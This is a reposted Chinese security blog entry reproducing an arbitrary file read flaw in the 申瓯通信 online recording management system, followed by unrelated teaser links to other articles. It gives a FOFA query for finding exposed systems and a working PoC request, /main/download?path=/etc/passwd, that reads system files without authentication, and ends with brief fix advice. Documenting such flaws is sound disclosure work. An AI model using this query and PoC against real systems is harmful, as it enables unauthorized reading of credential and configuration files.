申瓯通信在线录音管理系统任意文件读取漏洞复现

news2024/11/17 1:44:36

简介

申瓯通信设备有限公司在线录音管理系统 download 接口处任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件、数据库配置文件等等，导致网站处于极度不安全状态。

漏洞复现

FOFA语法：

title="在线录音管理系统"

访问界面如下所示：

POC：

/main/download?path=/etc/passwd

拼接url GET请求访问：

http://ip/main/download?path=/etc/passwd

可直接下载到改系统的/etc/passwd文件

证明任意文件读取漏洞存在

修复建议

联系厂商升级至安全版本

添加接口访问控制

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1864684.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

推荐一本RMS包作者写的我正在追读的书《Regression Modeling Strategies》

mechanize - 自动化与HTTP web服务器的交互操作

1、前言随着自动化测试的普及与落地推广，出现了众多知名的自动化测试工具，如Selenium 、Robot Framework、Playwright等。本文将介绍一款在Python环境下的mechanize库，这个库能够模拟浏览器行为，支持发送HTTP请求、解析HTML页面和…

Day13—大语言模型

定义大语言模型（Large Language Models）是一种基于深度学习的自然语言处理（NLP）模型，用于处理和生成人类语言文本。一、认识NLP 什么是NLP NLP（Natural Language Processing）&#xff0…

vue3+crypto-js插件实现对密码加密后传给后端

最近在做项目的过程中又遇到了一个新的问题，在实现后端管理系统的个人信息页面中，涉及到修改密码的功能，刚开始我直接通过传参的方式将修改的密码传入给后端，可是后端说需要将原密码、新密码以及确认密码都进行加密处理&#xff0…

高铝粉煤灰提取氧化铝可实现资源最大化利用我国政府重视程度高

高铝粉煤灰提取氧化铝可实现资源最大化利用我国政府重视程度高高铝粉煤灰，是指氧化铝含量大于37%的粉煤灰，高铝粉煤灰提取氧化铝，是以高铝粉煤灰为原料，提取氧化铝的技术，可以提高我国氧化铝供应能力，实现…

C语言的学习发展路线（都是干货）

哈喽，大家好呀~我又回来了，前期比较忙，没有时间来更文，现在给大家推荐了一个C语言的学习路线，供大家一起学习啦！ 1. 环境搭建与工具篇选择编译器：常用的编译器有gcc、Clang、Visual Studio等。…

Linux rpm包管理

rpm用于互联网下载包的打包及安装工具，它包含在某些Linux分发版中。它生成具有.RPM扩展名的文件。RPM是RedHat Package Manager (RedHat软件包管理工具）的缩写，类似windows的setup.exe，这一文件格式名称虽然打上了RedHat的标志&am…

10分钟掌握Python缓存,效率提升1000%

全文速览 python的不同缓存组件的使用场景和使用样例cachetools的使用项目背景代码检查项目，需要存储每一步检查的中间结果，最终把结果汇总并写入文件中在中间结果的存储中可以使用context进行上下文的传递，但是整体对代码改动比较大…

Jira实践案例分享：小米集团如何通过API请求优化、数据治理与AI智能客服等，实现Jira系统的高效运维

日前，Atlassian中国合作伙伴企业日活动在上海成功举办。活动以“AI协同创未来——如何利用人工智能提升团队协作，加速产品交付”为主题，深入探讨了AI技术在团队协作与产品交付中的创新应用与实践，吸引了众多业内专家、企业客户及…

股掌柜：实时行情数据和工具：揭示投资潜力的关键

如今充斥着各种投资信息、交易平台和金融工具的时代，如何抓住投资机会成为了每个投资者必须面对的重要挑战。一个明确的投资策略和准确的市场分析成为了判断市场走势和抓住投资机会的关键。而实时行情数据和工具的使用则能够为投资者提供全面、准确的市场信息&#…

选择诊所管理系统的原则是什么？

如今，诊所管理系统已成为医疗机构提升管理效率、优化患者服务的重要工具。然而，市场上的诊所管理系统琳琅满目，功能各异，因此，如何选择一款适合自己诊所的管理系统，是许多诊所管理者需要思考的问题。下面&a…

idea常用配置 | 快捷注释

idea快速注释一、类上快速注释 （本方法是IDEA环境自带的，设置特别方便简单易使用） 1、偏好设置->编辑器->文件和代码模版 | File-Settings-Editor-File and Code Templates 2、右下方的“描述”中有相对应的自动注注释配置格式贴…

什么是期货基金？

期货基金，是指广大投资者将资金集中起来，委托给专业的期货投资机构，并通过商品交易顾问进行期货投资交易，投资者承担投资风险并享有投资利润的一种集合投资方式。期货基金的投资对象主要有两大类商品：期货与金融期货。…

下载以及安装nvm方式 https://blog.csdn.net/ppz8823/article/details/130862191 1.查看nvm版本 nvm -v2.查看node 和 npm版本 node -v npm -v3.使用nvm查看已下载的node版本 nvm ls4.使用nvm 查看可使用的在线node版本 nvm list available4.下载想要使用的node版本&#x…